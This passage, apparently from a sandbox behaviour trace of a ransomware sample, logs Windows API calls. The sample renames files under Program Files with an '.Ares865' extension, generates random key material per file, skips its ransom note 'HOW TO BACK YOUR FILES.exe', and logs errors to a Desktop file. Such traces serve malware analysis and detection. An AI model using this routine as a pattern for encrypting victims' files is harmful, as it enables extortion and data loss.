viewer\\en-us\\imagingdevices.exe.mui.ares865"), dwFlags=0x1) returned 1 [0120.344] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\imagingdevices.exe.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0120.344] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0120.344] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0120.345] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0120.345] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.349] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0120.350] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0120.350] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.350] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui.Ares865") returned 74 [0120.350] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\photoacq.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\photoacq.dll.mui.ares865"), dwFlags=0x1) returned 1 [0120.352] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\photoacq.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0120.352] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19456) returned 1 [0120.352] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0120.353] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0120.353] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.362] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0120.362] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0120.362] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.363] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui.Ares865") returned 77 [0120.363] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\photoviewer.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\photoviewer.dll.mui.ares865"), dwFlags=0x1) returned 1 [0120.365] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\photoviewer.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0120.366] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17408) returned 1 [0120.366] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0120.367] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0120.367] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.372] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0120.373] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0120.373] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.373] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows NT", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows NT") returned="C:\\Program Files (x86)\\Windows NT" [0120.374] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows NT\\foo-badge.exe.Ares865") returned 55 [0120.374] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows NT\\foo-badge.exe" (normalized: "c:\\program files (x86)\\windows nt\\foo-badge.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows NT\\foo-badge.exe.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\foo-badge.exe.ares865"), dwFlags=0x1) returned 1 [0120.375] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\foo-badge.exe.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\foo-badge.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0xffffffff [0120.376] GetLastError () returned 0x20 [0120.376] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Program Files (x86)\\Windows NT\\foo-badge.exe CreateFile error 32\r\n") returned 77 [0120.376] lstrlenA (lpString="[ERROR] C:\\Program Files (x86)\\Windows NT\\foo-badge.exe CreateFile error 32\r\n") returned 77 [0120.376] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0120.376] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa516 [0120.377] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x4d, lpOverlapped=0x0) returned 1 [0120.378] CloseHandle (hObject=0x118) returned 1 [0120.378] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows NT\\foo-badge.exe.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\foo-badge.exe.ares865"), lpNewFileName="C:\\Program Files (x86)\\Windows NT\\foo-badge.exe" (normalized: "c:\\program files (x86)\\windows nt\\foo-badge.exe"), dwFlags=0x1) returned 1 [0120.379] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0120.379] CloseHandle (hObject=0x0) returned 0 [0120.379] CloseHandle (hObject=0xffffffff) returned 0 [0120.379] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5218e6a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5218e6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0120.379] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0120.379] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x521b4800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x521b4800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TableTextService", cAlternateFileName="TABLET~1")) returned 1 [0120.379] lstrcmpiW (lpString1="TableTextService", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0120.379] lstrcmpiW (lpString1="TableTextService", lpString2="aoldtz.exe") returned 1 [0120.379] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows NT\\TableTextService", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows NT\\TableTextService") returned="C:\\Program Files (x86)\\Windows NT\\TableTextService" [0120.380] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextService.dll.Ares865") returned 79 [0120.380] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservice.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextService.dll.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservice.dll.ares865"), dwFlags=0x1) returned 1 [0120.381] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextService.dll.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservice.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0120.381] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=325120) returned 1 [0120.382] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0120.382] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0120.382] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.400] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0120.401] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0120.401] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.406] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt.Ares865") returned 86 [0120.406] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextserviceamharic.txt"), lpNewFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextserviceamharic.txt.ares865"), dwFlags=0x1) returned 1 [0120.408] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextserviceamharic.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0120.408] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16212) returned 1 [0120.408] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0120.409] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0120.409] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.413] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0120.413] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0120.413] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.414] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.Ares865") returned 84 [0120.414] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicearray.txt"), lpNewFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicearray.txt.ares865"), dwFlags=0x1) returned 1 [0120.415] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicearray.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0120.416] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1272822) returned 1 [0120.416] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0120.417] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0120.417] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.475] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0120.476] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0120.476] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.493] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt.Ares865") returned 83 [0120.493] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicedayi.txt"), lpNewFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicedayi.txt.ares865"), dwFlags=0x1) returned 1 [0120.496] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicedayi.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0120.496] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=980102) returned 1 [0120.496] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0120.497] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0120.497] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.562] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0120.563] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0120.563] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.578] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.Ares865") returned 96 [0120.578] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), lpNewFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.ares865"), dwFlags=0x1) returned 1 [0120.580] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0120.580] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1665878) returned 1 [0120.581] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0120.581] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0120.581] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.712] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0120.712] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0120.713] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.739] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.Ares865") returned 98 [0120.739] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), lpNewFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.ares865"), dwFlags=0x1) returned 1 [0120.742] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0120.743] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1445430) returned 1 [0120.743] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0120.744] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0120.744] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.876] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0120.877] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0120.877] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.898] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt.Ares865") returned 96 [0120.898] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedzhengma.txt"), lpNewFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedzhengma.txt.ares865"), dwFlags=0x1) returned 1 [0120.901] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedzhengma.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0120.901] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1810352) returned 1 [0120.902] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0120.902] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0120.902] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.065] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0121.066] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0121.066] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.091] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt.Ares865") returned 81 [0121.091] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextserviceyi.txt"), lpNewFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextserviceyi.txt.ares865"), dwFlags=0x1) returned 1 [0121.095] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextserviceyi.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0121.096] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=44968) returned 1 [0121.096] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0121.097] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0121.097] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.103] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0121.104] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0121.104] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.105] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US") returned="C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US" [0121.106] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui.Ares865") returned 89 [0121.106] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui.ares865"), dwFlags=0x1) returned 1 [0121.108] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0121.108] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0121.108] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0121.109] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0121.109] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.114] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0121.115] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0121.115] CryptReleaseContext 